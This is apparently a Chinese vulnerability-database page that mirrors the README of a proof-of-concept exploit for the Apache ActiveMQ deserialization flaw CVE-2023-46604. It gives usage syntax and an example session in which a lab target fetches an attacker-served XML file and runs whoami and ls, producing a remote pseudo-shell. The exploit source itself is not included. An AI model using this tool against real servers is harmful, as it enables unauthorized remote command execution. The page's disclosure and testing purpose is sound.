漏洞平台

POC详情： 41577cd1378ec4311149f6ee019790741b302368

来源

https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

关联漏洞

标题： Apache ActiveMQ 代码问题漏洞 (CVE-2023-46604)
描述：Apache ActiveMQ是美国阿帕奇（Apache）基金会的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞，该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。

描述

This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.

介绍

# CVE-2023-46604 RCE Pseudoshell

This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.


## Description

CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol. This flaw can be exploited by an attacker to execute arbitrary code on the server where ActiveMQ is running. An attacker can craft a malicious xml file, commands from which will be executed by the remote server. 

This explot automates and abstracts the process of xml document creation, provides a basic server to deliver the file and receives information back from the target server via POST. This allows continued exploitation without the need to invoke a reverse shell, or deploy a binary. 


## Prerequisites

Before running the exploit script, ensure that you have:

- Python 3.x installed on your system.
- Network access to the vulnerable ActiveMQ server.
- Permssion to test against the vulnerable server. 


## Usage

The script requires:
- ActiveMQ Server IP or Hostname
- Serve IP (An IP on your system, reachable by the target.)

Optional:
- ActiveMQ Server Port - defaults to 61616
- Serve port (The port to start the local server on) - defaults to 8080

```
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

```

## Example

```
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 
```
[CVE-2023-46604-RCE.webm](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell/assets/129839654/38f280fa-2252-4161-acb3-9b92d3635eac)


## Credits
This exploit builds on the oiringal POC in Go by [X1r0z](https://github.com/X1r0z/ActiveMQ-RCE) and Python POC by [evkl1d](https://github.com/evkl1d/CVE-2023-46604).

## Disclaimer

This code is provided for educational and ethical security testing purposes only. It should be used responsibly and only in environments where explicit authorization has been granted. Unauthorized or malicious use is strictly prohibited. By using this code, you agree to adhere to all applicable laws, regulations, and ethical standards applicable in your jurisdiction. The creators and contributors disclaim any liability for any damages or consequences arising from the misuse or unauthorized use of this code.

文件快照


 [4.0K]  /data/pocs/41577cd1378ec4311149f6ee019790741b302368
├── [6.0K]  exploit.py
├── [ 547]  poc.xml
└── [4.3K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。